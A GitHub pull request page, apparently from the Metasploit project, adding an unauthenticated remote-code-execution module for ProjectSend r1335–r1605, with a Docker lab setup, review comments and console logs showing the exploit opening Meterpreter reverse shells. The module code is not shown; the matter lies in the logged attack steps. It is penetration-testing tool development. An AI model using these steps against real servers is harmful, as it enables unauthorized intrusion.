Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ProjectSend r1335 - r1605 RCE module #19531

Merged
merged 1 commit into from
Nov 21, 2024

Conversation

ostrichgolf
Copy link
Contributor

This PR is a duplicate of #19433, however this comes from a unique branch as instructed by @jheysel-r7.

Original PR message added for clarity:

This pull request adds a new exploit module targeting ProjectSend versions r1335 through r1605.

The module exploits an improper authorization vulnerability, allowing unauthenticated RCE by manipulating the application's configuration settings.

This exploit is largely based on the advisory by Synacktiv, which can be found here.

For the exploit to work, it is necessary to enable client registration, allow all users to upload files, and enable automatic approval of new clients. Since these settings are unknown prior to or during exploitation, the module provides an option to reset them to their default secure state after exploitation, as a more secure alternative.

Verification steps

The following Docker Compose file can be used to set up a vulnerable environment:

---
    services:
      projectsend:
        image: lscr.io/linuxserver/projectsend:version-r1605
        container_name: projectsend
        environment:
          - PUID=1000
          - PGID=1000
          - TZ=Etc/UTC
          - MAX_UPLOAD=5000
        volumes:
          - ./projectsend/config:/config
          - ./projectsend/data:/data
        ports:
          - 80:80
        restart: unless-stopped
      db:
        image: mariadb
        restart: unless-stopped
        container_name: db
        volumes:
          - ./mariadb_data:/var/lib/mysql
        environment:
          MYSQL_ROOT_PASSWORD: password
          MYSQL_DATABASE: projectsend
          MYSQL_USER: projectsend
          MYSQL_PASSWORD: projectsend

After launching the containers, ProjectSend requires initial configuration, which can be completed by accessing port 80 on localhost.

The exploit has been tested and confirmed to work against the following versions:

  • r1335
  • r1415
  • r1420
  • r1584
  • r1605

Known Issues

  • Occasionally, authentication fails randomly across all tested versions. This issue has been observed during manual testing of the application as well, indicating that it is not related to the Metasploit module. The module currently informs the user if this issue occurs.
  • The module currently attempts every possible payload URL. Is there a way to exit early if a shell is successfully obtained?
screenshot

@dledda-r7 dledda-r7 self-assigned this Oct 7, 2024
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hello ostrichgolf, Thanks for your PR!
I've left couple of comments, question and improvement for the module along with some logs of the testing.

ProjectSend r1605 on Docker

msf6 exploit(linux/http/projectsend_unauth_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(linux/http/projectsend_unauth_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/projectsend_unauth_rce) > set rport 8080
rport => 8080
msf6 exploit(linux/http/projectsend_unauth_rce) > exploit

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Client registration successfully enabled
[+] User troy_okeefe created with password fiuYFr22
[*] Disabling upload restrictions...
[*] Logging in as troy_okeefe...
[-] Exploit aborted due to failure: no-access: Failed to authenticate. This can happen, you should try to execute the exploit again
[+] Client registration successfully disabled
[*] Enabling upload restrictions...
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/projectsend_unauth_rce) > exploit

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Client registration successfully enabled
[+] User alphonse created with password vBbTZFYI
[*] Disabling upload restrictions...
[*] Logging in as alphonse...
[+] Logged in as alphonse
[+] Successfully uploaded PHP file: fw9G20My.php
[*] Sending stage (39927 bytes) to 172.19.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.19.0.2:59904) at 2024-10-07 07:38:40 -0400
[*] Logging in as alphonse...
[+] Logged in as alphonse
[+] Client registration successfully disabled
[*] Enabling upload restrictions...

meterpreter > sysinfo
Computer    : fe50101fbbdc
OS          : Linux fe50101fbbdc 6.10.9-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.10.9-1kali1 (2024-09-09) x86_64
Meterpreter : php/linux
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(linux/http/projectsend_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > exit
[*] Shutting down session: 1

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf6 

modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
@dledda-r7 dledda-r7 removed their assignment Oct 17, 2024
@ostrichgolf
Copy link
Contributor Author

@jheysel-r7 / @dledda-r7 : Is there anything you need from me to move this toward merging?

@jheysel-r7 jheysel-r7 self-assigned this Oct 30, 2024
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @ostrichgolf there's a couple more changes that need to be made, mostly regarding the need for the check method to return a CheckCode. Otherwise the modules looking great. Let me know if you have any questions. Cheers.

modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/projectsend_unauth_rce.rb Outdated Show resolved Hide resolved
@jheysel-r7 jheysel-r7 removed their assignment Nov 1, 2024
@jheysel-r7 jheysel-r7 self-assigned this Nov 21, 2024
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great work @ostrichgolf, thanks for the module. I've retested and everything looks good 👍

msf6 exploit(linux/http/projectsend_unauth_rce) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Client registration successfully enabled
[+] User renaldo created with password YzE5IWV4
[*] Disabling upload restrictions...
[*] Logging in as renaldo...
[+] Logged in as renaldo
[+] Successfully uploaded PHP file: TiZvhJWJ.php
[*] Sending stage (39927 bytes) to 172.16.199.132
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:57952) at 2024-11-21 09:36:45 -0800
[*] Logging in as renaldo...
[+] Logged in as renaldo
[+] Client registration successfully disabled
[*] Enabling upload restrictions...

meterpreter > sysinfo
Computer    : 7837b0b51ebf
OS          : Linux 7837b0b51ebf 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov  6 17:42:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 368 created.
Channel 0 created.
id
uid=1000(abc) gid=1000(users) groups=1000(users)

@jheysel-r7 jheysel-r7 merged commit d95d549 into rapid7:master Nov 21, 2024
36 checks passed
@jheysel-r7
Copy link
Contributor

Release Notes

Adds a new exploit module targeting ProjectSend versions r1335 through r1605. The module exploits an improper authorization vulnerability, allowing unauthenticated RCE by manipulating the application's configuration settings.

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 21, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Status: Done
Development

Successfully merging this pull request may close these issues.

6 participants